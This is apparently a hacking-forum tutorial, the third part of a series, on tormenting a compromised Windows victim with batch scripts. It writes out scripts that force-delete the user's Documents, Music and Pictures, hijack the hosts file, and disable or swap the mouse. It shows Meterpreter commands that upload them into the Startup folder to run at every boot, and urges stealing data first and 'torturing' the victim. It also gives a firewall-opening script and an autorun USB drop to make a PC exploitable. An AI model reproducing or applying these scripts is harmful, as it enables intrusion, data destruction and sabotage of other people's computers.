At last, what you all finally waited for!
Hi! Fire Crackers,
Welcome to my 7th post (Part-3), this tutorial will explain about some situations and how to make the Victim's Life like Hell! And fill his system with Malware.
#1 Situation: After Exploiting...
- Go ahead and exploit the Victim's PC.

Ready Your Weapons:

Let me Supply you some (Real) Ammo:
------------Copied From here BUT, edited, + added my own-----------
Go to that site and choose your weapons and ammo.
Some explanation:
1) Block Google.
@echo off
cd "C:\Windows\System32\Drivers\etc"
echo >> "Hosts"
echo >> "Hosts"
It adds this Domain/Website name to the hosts folder, and any-website contained in this folder gets blocked (In simple words)
2) Change time:
@echo off
time 00:00
I didn't like it but its quite freaky!
3) Delete My Pictures , Documents etc...
@echo off
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
del /f /q "C:\Users\%userprofile%\My Music\*.*"
del /f /q "C:\Users\%userprofile%\My Pictures\*.*"
- del means delete.
- /f is a switch, which force deletes the files, if they are read-only.
- /q is a switch, which quietly deletes the files without any prompts.
- *.* to delete all the items in the current directory.
4) Swap Mouse Button:
@echo off
Rundll32 user32,SwapMouseButton
An easy scripts, that changes the setting of mouse from control panel.
5) Disable Mouse:
@echo off
set key="HKEYLOCALMACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4_
Complicated Script, Edits the registry settings for mouse, By navigating to its folder and editing DWORD (+ other values.)
If you need more scripts, but can't understand the meaning then, ask me in the comments section
Let's Start the Upload Process:
I have exploited the PC, on WAN with static IP as my NET Connection is Slightly faster, but I highly recommend to do this on LAN, because Uploading will take Hours Until the Victim's as well as the attackers connection Speed is FAST!

After the Meterpreter Prompt:
- FIRST, Download all the important, information you need, before it gets deleted by these scripts.
- Copy those scripts above and paste then in notepad and save them with the extension .bat
- Now it's time to upload them, all!
- You can also make your own scripts like of aggravating messages etc. (which will Welcome the user at start-up with the word "DIE".
- Save all the scripts with the name, a,b,c,d,e (.bat) respectively.

- Move these scripts to the root directory of Kali (the host)
- Type: (In the meterpreter:)
- cd /
- ls
- cd Users/%pf%/AppData/Roaming/Microsoft/Windows/"Start Menu"/Programs/Startup

- Upload a.bat
- Upload b.bat
- Upload c.bat
- Upload d.bat
- Upload e.bat

On the victim's Side:

Upload Finished, Let the Victim Enjoy!
- These Scrips will execute as soon as the Victim's system is Started/Re-Started
- I am not going to show you how to make scripts that send victim's Log Data Through FTP, because you can simply use the download command or in-build Kali meterpreter commands/modules.
- Don't use scripts like the Folder Bomber etc, or the victim will become suspicious and format his PC.
- Now. I hope you can make scripts that slowly eat RAM in the background, use Task Scheduler etc...
- Also, don't use scripts that FORMATs his/her PC, in other words,
- Torture the Victim, don't just simply Kill him!
- And my work for this situation is done here.
- Victim can use safe mode to counter this, but can have a hard time finding it in Windows 8.
#2 Situation: For the Exploit
You can use batch scripts, for even exploiting the PC!
You need a physical access to the PC, (or Convince the Victim to open the script.)
- Copy this script:
@echo off
netsh firewall set portopening tcp 445 smb enable
(NOT Tested)
Cause:Opens the specified port and make the victim, Vulnerable.
(Open all the vulnerable ports)
- Save it as anything.bat
- Make an autorun file:

- Save it as autorun.inf.
- Put them in a Flash/Pen Drive. Connect this drive to the victims PC for about five seconds, and pull it out.
- Done! (No one knows what you just did!)
- Exploit and have Fun!
- Batch scripts can be easily opened/edited and read by anyone, it's better to convert them to .exe (executable files)
- Some Batch files may need Admin Permission.
- So, you can manually execute them by going into the shell and navigating to the correct directory and typing start whatever.bat
- Situation 2, may not work if the auto-run is disabled.
- And try some more Disables: Here
I hope you had Fun today!
The Final part of Batch, will be about Protection using Batch!
Until then ByE.
Keep Coming for More!
Thank You,
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